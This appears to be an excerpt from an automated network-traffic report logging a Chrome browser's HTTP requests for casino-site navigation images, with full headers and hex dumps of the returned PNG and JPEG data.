                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37279
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 15 Jun 2021 06:40:58 GMT
                                                                                                                                                          ETag: "60c84b7a-919f"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE11[4],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b96505d93eee532d51606caf855a9d50
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 20 00 49 44 41 54 78 9c ec 7d 07 bc 54 d5 b5 fe b7 f7 a9 d3 e7 f6 0e 97 de cb a5 29 8a 0d 62 2c 98 58 88 25 9a 67 17 b1 c6 f8 34 31 89 f1 25 9a bc 24 2f cf 58 a2 a2 a2 46 4d 34 6a 8a b1 6b 8c 05 51 11 04 2e bd 5f 84 db fb 9d 3e a7 9f ff 6f ef 99 8b b7 81 80 5c 62 7e ff b7 f8 0d f7 cc 99 d3 e6 9c 35 6b ed f5 ad 6f ad 4d 42 f3 7e 85 c3 25 55 13 ca d0 62 07 e0 17 62 70 c4 1c e4 eb 4d 88 89 95 10 8c 46 a4 c5 22 28 89 7a 7c fc d2 fb 98 7d c1 55 90 95 34 34 d3 02 4d ee 06 0d 0d 43 0a f9 28 b2 76 21 25 06 a0 69 06 5a b6 2c 87 6f ec 31 fc ca f6 ec 5c 8f 31 e3 c6 42 f5 84 f7 79 a5 c1 8e 6a bc f9 f4 c3 7c f9 a4 6b 7f 8c f7 7e 77 53 66 f9 a2 85 78 ef af 1b 30 f5
                                                                                                                                                          Data Ascii: PNGIHDRua IDATx}T)b,X%g41%$/XFM4jkQ._>o\b~5koMB~%UbbpMF"(z|}U44MC(v!%iZ,o1\1Byj|k~wSfx0
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 61 41 82 05 d7 15 79 e7 23 36 a7 82 e3 66 fb b3 51 15 82 47 84 19 6b c7 ee e7 de c4 ba 77 de 41 53 47 3b 86 fb 42 68 4b 59 78 b9 b5 0d bf 7a ee 19 94 4f 1f 01 ab a3 03 92 47 82 9d 8a 63 dc d4 d1 98 31 f7 d8 2c c6 66 c0 d4 74 e8 69 03 1f 2e 5b 8f 5f 3d f0 02 36 ed a8 43 3c e1 e1 15 61 e1 5c 3f bc 6c a8 90 6d 2b 82 23 c3 06 71 ea 1b b7 be ef a8 39 d4 a2 b2 6b 13 8b 68 6e dc 19 70 cc ae 0d 40 11 b7 2d 06 8c 0b ae 48 84 5e 57 3a e5 96 d7 b0 ee 9e 5e dd 05 dd 0e 65 7c ba 2b 54 0a 87 0a 08 c0 42 5e a2 01 f0 ec 03 cf 63 0d cb 08 39 6c ca c6 ac 99 9d a5 7d 27 75 03 1d ed 31 ec a9 a9 c7 88 11 15 9c aa 5d b3 a3 86 39 76 84 43 b9 30 4d 07 ad 4d cd 7c 4a 20 2d 95 80 c6 3a 7d b3 c2 17 8f 07 8a 2a 73 eb c6 3a 15 4d 9a 3a 11 a2 22 a1 66 5b 2d af 62 b7 6c 03 b1 8e 28 9f
                                                                                                                                                          Data Ascii: aAy#6fQGkwASG;BhKYxzOGc1,fti.[_=6C<a\?lm+#q9khnp@-H^W:^e|+TB^c9l}'u1]9vC0MM|J -:}*s:M:"f[-bl(
                                                                                                                                                          2024-06-09 22:41:20 UTC5127INData Raw: db d9 05 3d 14 46 5f f7 20 9e 7d f2 49 de 8e 94 d3 fe 5f 93 a7 e8 15 c5 87 ff 63 7d d1 b0 d1 78 fe 57 a6 38 9e 37 a7 fd ae 9b 1e 34 2c 03 47 5c 7e 5d 6d 58 f2 9c b5 bf ff 6d 0a 6c 76 6b 20 6f f4 e3 43 0b 66 e2 57 df be 0c 89 88 8e 62 b9 cc ba 69 a2 24 cf 94 25 e9 9f 05 49 b9 44 52 15 99 08 2a 2c 4b ca 59 4d e3 93 e4 68 c3 96 2e b0 c7 c1 66 fb d7 21 e8 a9 d9 64 a6 3b aa ac c7 78 35 87 65 a8 a8 ed 41 bc 81 42 a9 88 64 45 15 ab 14 31 94 28 d0 f3 65 94 08 1d 76 09 78 49 c4 61 a2 f5 d9 16 73 1f f4 aa 46 ae e7 38 33 0a fb 14 43 74 62 2d e7 01 ab 40 e2 27 f4 36 e6 20 78 b7 8a 82 f2 5f 10 a4 4e df 00 5d d8 e7 01 9c 73 c3 c3 75 9a 16 b1 1f bc e1 c4 54 64 c2 3f 08 0b af fb b7 0b 3d 59 7c fd b9 cf 8d ef a0 53 f1 e9 bf e8 9b 8b 72 a1 f7 a1 ab eb fb cb 74 4a 85 87 ea
                                                                                                                                                          Data Ascii: =F_ }I_c}xW874,G\~]mXmlvk oCfWbi$%IDR*,KYMh.f!d;x5eABdE1(evxIasF83Ctb-@'6 x_N]suTd?=Y|SrtJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          561192.168.2.55034490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC611OUTGET /pc/image-pc/index/312/nav/liveCasino/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 42069
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:47 GMT
                                                                                                                                                          ETag: "5d71fe7f-a455"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE15[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5ffe0ba3bbd1baf6c982d132e66c6ef3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 9c 26 57 75 e7 8f bf 6f a8 aa 27 f7 d3 79 a2 26 8f 46 39 47 10 28 82 40 04 93 8c 01 13 85 24 82 09 f6 62 af ed b5 77 59 db 6b af bd eb 80 c1 80 90 44 06 11 4d 06 e5 84 72 9c 51 1e 69 72 e8 99 ce dd 4f ae 70 ef fd fe 51 f5 74 f7 8c 24 84 40 02 fb f7 db c3 ab d0 4c 4f 3f 4f 55 dd 3a 75 ee 09 9f f3 39 82 ff 27 bf 40 24 0a 85 91 87 b0 ee 8f af 7c ed 84 5a f5 fd aa f3 b1 b1 21 d6 8a 52 e7 f1 73
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxw&Wuo'y&F9G(@$bwYkDMrQirOpQt$@LO?OU:u9'@$|Z!Rs
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 64 f9 b3 60 90 96 c9 2f cd 31 b6 91 78 12 88 b0 49 94 25 8b b3 c6 55 7c ce 7d fd 9b bc eb be 7f 75 8c ce f3 b3 2b be 36 8d f4 ee 24 69 40 3c c2 81 9d ad 73 db cd 29 d6 98 2c 4b fe 1b 1e 03 f7 34 e2 9c 73 b3 b3 b3 0c 0f f6 52 0c 06 a8 4d ec 63 7c 72 92 62 b9 17 94 87 43 1e 94 bb 3a d8 87 4b ef 41 2b 85 92 12 e1 a5 4d cd 5d 9e 11 63 d3 97 49 6b 4d 3e 9f e7 90 43 56 d2 aa 37 31 09 48 d9 e1 88 23 0e c3 5a c3 c8 c8 28 ed d6 dd d9 53 ef a2 42 24 49 62 c0 f9 c4 b1 a5 51 6f b2 e2 90 45 ec de b3 9d c9 c9 29 c2 30 44 48 31 09 8c f1 3c 91 c6 9b ac b2 63 8c c1 59 77 8a 94 f2 87 4a 2a e2 24 e4 a7 ff fe bd 98 dc c6 6b 10 e5 8c 9b 2d 07 ce f1 92 57 bf d6 bb e5 47 5f 88 c1 90 11 00 cf 49 82 49 73 71 d1 34 c2 b6 b6 85 ba b0 01 57 7c 08 e1 a3 25 60 75 2f 4b 5f f3 5e 3f f2
                                                                                                                                                          Data Ascii: d`/1xI%U|}u+6$i@<s),K4sRMc|rbC:KA+M]cIkM>CV71H#Z(SB$IbQoE)0DH1<cYwJ*$k-WG_IIsq4W|%`u/K_^?
                                                                                                                                                          2024-06-09 22:41:20 UTC9918INData Raw: be 23 51 ae 6c 2a 3d 29 1c 02 1c 02 ac 08 1d b4 fd 52 cd 24 1e e6 7c 1b f0 f1 48 d1 85 08 90 53 d8 ff 63 df ee 22 33 f9 76 b7 38 70 d1 73 b7 7d 7d 33 fe 2a 5c ab 48 18 d6 1b c1 ef f6 d2 0c 4a 26 c1 ee 32 c8 8f 40 b2 f0 d2 cb 3b 7c 91 3e c1 d5 e1 fa 47 6f f8 fa 22 28 9b 32 16 55 f3 85 b5 49 cc ba b6 c5 e6 d7 37 e6 fc 7a f5 31 af 56 9d 1f 78 35 02 af 46 bd 5a a1 af af 8f f5 1b 7b c8 76 76 83 9d 60 c5 ca d5 6c db b6 15 e5 d5 a9 d7 ab 94 2a b5 86 89 8c b5 5a bc c5 ac 42 b1 86 1a 9f 1e 89 7d 31 cf f3 28 16 8b 8d dc 5c 6c 0e e3 f7 a6 52 29 d2 e9 b4 29 61 b9 6e 43 d8 94 52 0d 1a fc f8 78 e3 eb bc f1 03 14 ff af 5e af 53 2c 16 19 1e 1e c6 c5 65 6a fb 34 f2 c9 2c a0 d0 f8 20 02 fc a0 ce ec d9 bb 33 3c 3c 44 ef d6 61 3c 2f a0 b5 a3 a5 fa f1 cb 2f fb ed 6e 7b ee 31
                                                                                                                                                          Data Ascii: #Ql*=)R$|HSc"3v8ps}}3*\HJ&2@;|>Go"(2UI7z1Vx5FZ{vv`l*ZB}1(\lR))anCRx^S,ej4, 3<<Da<//n{1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          562192.168.2.55034390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC611OUTGET /pc/image-pc/index/312/nav/liveCasino/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 42776
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:48 GMT
                                                                                                                                                          ETag: "5d71fe80-a718"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[6],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE11[4],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b95a87bf85f88e0cdb09583c1290d8b2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 a5 55 79 ff 8f bf 56 79 ca ee a7 9f e9 0c 43 ef bd 2a 20 a0 54 63 8f 1a 4d 0c 28 08 d6 98 66 8a f9 7c 62 4c be 31 cd 7c 63 62 a3 d8 c0 82 25 11 bb f4 a2 08 08 cc 50 07 66 98 de 4e 6f bb 3e 6d ad f5 fb e3 d9 e7 cc 0c 52 34 80 7c f3 bb b2 ae 6b 5f 53 ce 3e 7b 3f cf 5a f7 73 d7 f7 fd be 05 ff bb 9e 65 49 14 0a 23 57 70 c0 9f 7e fd b5 93 6a df eb 7b 9c 8f 4d 0d a9 56 94 a3 27 ce 5e ff a9 df
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxwUyVyC* TcM(f|bL1|cb%PfNo>mR4|k_S>{?ZseI#Wp~j{MV'^
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: e4 fc cb df db 8b 0e 0f 52 15 ff f8 d3 ce 3b ef b6 9f 7e ef 5a 03 29 42 42 6c 0d 28 81 15 9c f4 42 6f 9c 73 4e 24 49 2a 85 10 24 59 8c 49 63 02 a0 e0 07 f4 0d 0e 30 33 37 c7 8c 99 a3 54 08 28 16 0a 68 a5 90 32 6f 46 51 32 1f 6e 2b 84 a0 dd ee b0 6b cb 66 6e b9 e9 46 9e 5c bf 9e be 9e 5e ea b3 73 44 ed 36 fb ac 5c c9 d1 47 1e c9 3e ab 56 52 2c 97 51 5e 3e f3 c9 39 81 17 14 a8 f5 f6 d3 69 46 64 5a 50 ad f5 e0 79 1e 71 1c 13 86 39 91 b8 b5 26 6f 9a 71 96 55 fb 1e c4 ae f1 ad cc ce e6 ed 9c 95 6a 48 ad af cc 4c a3 49 3d 32 18 13 0b 6b ad 94 52 ee f6 90 7f 43 29 90 a7 f4 ae 9e 94 66 c9 f7 84 90 38 07 17 be fe b5 9e e7 b9 e3 53 d7 98 96 d9 d4 8d 37 5e fd d9 b9 9c 96 21 01 9b 63 1a ed d3 71 95 98 04 bc 0e 81 32 23 b2 5c db 97 a0 f7 11 e2 26 da 64 5d 66 9b 60 90
                                                                                                                                                          Data Ascii: R;~Z)BBl(BosN$I*$YIc037T(h2oFQ2n+kfnF\^sD6\G>VR,Q^>9iFdZPyq9&oqUjHLI=2kRC)f8S7^!cq2#\&d]f`
                                                                                                                                                          2024-06-09 22:41:20 UTC10625INData Raw: 59 78 3c 46 0b 4c 8c 30 4d 4d 37 09 d2 c1 71 3c a5 95 be 26 8a e3 ad da 18 91 8c 78 6c b1 17 7e d7 da 75 3e 82 ad 87 14 3b 3a e8 eb ef 6b 49 d4 b7 7f b5 40 5e c7 21 9b cd 12 04 01 f3 e6 cd a3 bf bf 1f 63 0c 5d c5 4e e6 f5 cf a5 23 97 47 27 5b 6e 2b 03 86 5d 78 6b f0 fc 26 98 e6 63 db 9f f3 bb d7 ae d2 0a 52 c8 d6 4d 51 2a 95 d0 48 e6 cd 5f c8 dc 81 05 ec b1 e7 5e 08 c7 25 9b cf 33 35 35 c5 c6 8d 9b a8 57 6b b8 12 e2 7a 85 8d eb d7 b3 e1 99 75 4c 8c 0c 53 9a 18 41 ab 90 7a d8 58 91 ee ea 7c a3 10 5e 6c 54 f2 5e 51 04 8d 98 20 df 77 d2 49 97 7e ec 64 fc 6e 50 13 fc e6 fa 7f 7d d8 89 06 7f 1e 3a de b1 07 bf f7 4b a7 ef fd b6 ff f0 10 fd 76 17 92 06 5c a7 45 a7 75 d0 78 c4 09 fb 43 bf e0 16 ba fb ef 9c 26 c3 de b4 6a 51 0a 8c c3 c2 43 4f 78 3a eb b3 7f 21 dc
                                                                                                                                                          Data Ascii: Yx<FL0MM7q<&xl~u>;:kI@^!c]N#G'[n+]xk&cRMQ*H_^%355WkzuLSAzX|^lT^Q wI~dnP}:Kv\EuxC&jQCOx:!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          563192.168.2.55033554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC639OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC329INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-3d69"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 10542879327211104944
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          564192.168.2.55034690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC607OUTGET /pc/image-pc/index/312/nav/casino/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 38521
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:44 GMT
                                                                                                                                                          ETag: "5d71fe7c-9679"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d9a145eae59fcececfd1294d0c309f34
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 25 57 75 e6 01 ff 76 a8 aa 93 cf cd b7 73 52 56 2b 02 ca 02 01 06 19 91 0c 06 6c a2 c1 c6 80 48 c6 11 87 cf c6 9e 60 cf 8c 8d c7 33 60 72 34 c9 d8 c6 36 98 20 14 50 96 50 0e 2d b5 ba 5b ea 9c 6e df 7c 4f ac b4 c3 f7 47 9d db dd 22 49 1a 90 67 be 6f 66 f7 53 cf bd 7d ee 39 75 aa f6 5e b5 f6 0a ef 7a 97 e0 7f f3 90 c8 a7 f4 7e 87 fb c9 6f 10 4f e1 64 7e f0 b3 74 12 97 bc e5 6f 26 96 1a 27
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxw%WuvsRV+lH`3`r46 PP-[n|OG"IgofS}9u^z~oOd~to&'
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: e8 56 87 de 43 40 ab 20 e2 2b ce ba e2 e9 b8 61 3f c0 81 38 e7 4c b9 5c 9e 1f 1a 1a 5a a3 b5 96 91 52 58 49 75 a1 db ae 88 28 68 8c 8f 8c b3 ed e1 ad d3 dd 6e 67 24 2c 85 a5 b0 5a f6 fd 4e 4f 48 eb 08 84 20 4f 7b 4c 8c 0d 91 57 42 0e 1f 9e c1 78 4d 22 24 b9 b5 08 a5 11 ce e1 c8 48 5d d1 9f c4 4b 85 94 9a 72 58 65 7c 74 88 89 b1 71 4a e5 12 d6 18 94 82 72 39 64 68 a8 81 6b c7 18 2b f1 de 21 a5 44 0e 68 42 a2 28 42 4a 89 b3 ce 39 eb 70 ce d5 ad 70 fd 63 c9 8f e3 ca cd 7f c6 63 59 1b 4b cf 0a 2c 3b 11 29 d0 82 a9 2d ee fe 0f fd e1 11 82 26 44 8e e6 8b 2e 53 75 d3 56 07 af ff e7 82 e3 fd 07 bb c8 0f a8 c6 bc 34 2d 2b 5d 43 23 4b 18 54 10 78 fa cb 3d 90 8b 6a c3 65 a2 e3 98 a1 aa 3a 63 78 dd ca 35 f1 3b 5f 2f 6a 41 66 2b c9 a1 bd df fc db 5b b7 86 a2 d0 42 03
                                                                                                                                                          Data Ascii: VC@ +a?8L\ZRXIu(hng$,ZNOH O{LWBxM"$H]KrXe|tqJr9dhk+!DhB(BJ9ppccYK,;)-&D.SuV4-+]C#KTx=je:cx5;_/jAf+[B
